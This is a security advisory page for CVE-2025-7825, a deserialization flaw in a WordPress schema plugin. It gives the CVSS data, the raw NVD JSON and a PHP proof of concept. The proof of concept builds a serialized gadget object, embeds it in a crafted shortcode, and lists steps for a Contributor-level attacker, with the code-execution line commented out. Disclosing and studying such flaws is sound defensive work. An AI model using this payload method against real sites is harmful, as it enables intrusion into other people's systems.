Security Vulnerability Report
CVE-2025-7825 CVSS 6.3 MEDIUM

Published: 2025-10-03 12:15:45
Last Modified: 2026-04-15 00:35:42

Description

The Schema Plugin For Divi, Gutenberg & Shortcodes plugin for WordPress is vulnerable to Object Instantiation in all versions up to, and including, 4.3.2 via deserialization of untrusted input via the wpt_schema_breadcrumbs shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Schema Plugin For Divi, Gutenberg & Shortcodes <= 4.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
/**
 * CVE-2025-7825 PoC - Unsafe Deserialization via wpt_schema_breadcrumbs shortcode
 *
 * This PoC demonstrates how an authenticated attacker with Contributor-level
 * access can inject a malicious serialized PHP object through the
 * wpt_schema_breadcrumbs shortcode in the Schema Plugin For Divi, Gutenberg
 * & Shortcodes (versions <= 4.3.2).
 *
 * The exploit requires a POP chain present in another plugin/theme installed
 * on the target WordPress site to achieve code execution.
 */

// Step 1: Create a malicious serialized payload
// Example: A generic POP gadget payload (requires a compatible POP chain on target)
class MaliciousGadget
{
    public $command;

    public function __destruct()
    {
        // If a POP chain with code execution gadget exists on the target,
        // this could be triggered during deserialization
        if (isset($this->command)) {
            // Placeholder for exploitation logic
            // system($this->command);
        }
    }
}

// Generate serialized payload
$payload = serialize(new MaliciousGadget());

// Step 2: Craft the malicious shortcode to be injected into a post
// The shortcode will be processed by the vulnerable plugin
$malicious_shortcode = '[wpt_schema_breadcrumbs data="' . base64_encode($payload) . '"]';

// Step 3: Attacker with Contributor+ access submits a post containing the shortcode
echo $malicious_shortcode;

/**
 * Usage:
 * 1. Register or compromise an account with Contributor-level access
 * 2. Create a new post/page containing the crafted shortcode
 * 3. Submit for review or publish the post
 * 4. When the post is rendered, the plugin deserializes the payload
 * 5. If a POP chain exists in another plugin/theme, code execution is achieved
 *
 * Note: This vulnerability alone has no direct impact without a POP chain
 * present in another installed plugin or theme on the target system.
 */
?>

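References

https://wordpress.org/plugins/wp-structured-data-schema/
https://www.wordfence.com/threat-intel/vulnerabilities/id/ccb81a3e-744f-4a16-ad9b-1b9dbc09571c?source=cve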

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-7825", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:44.820", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Schema Plugin For Divi, Gutenberg & Shortcodes plugin for WordPress is vulnerable to Object Instantiation in all versions up to, and including, 4.3.2 via deserialization of untrusted input via the wpt_schema_breadcrumbs shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-96"}]}], "references": [{"url": "https://wordpress.org/plugins/wp-structured-data-schema/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ccb81a3e-744f-4a16-ad9b-1b9dbc09571c?source=cve", "source": "[email protected]"}]}}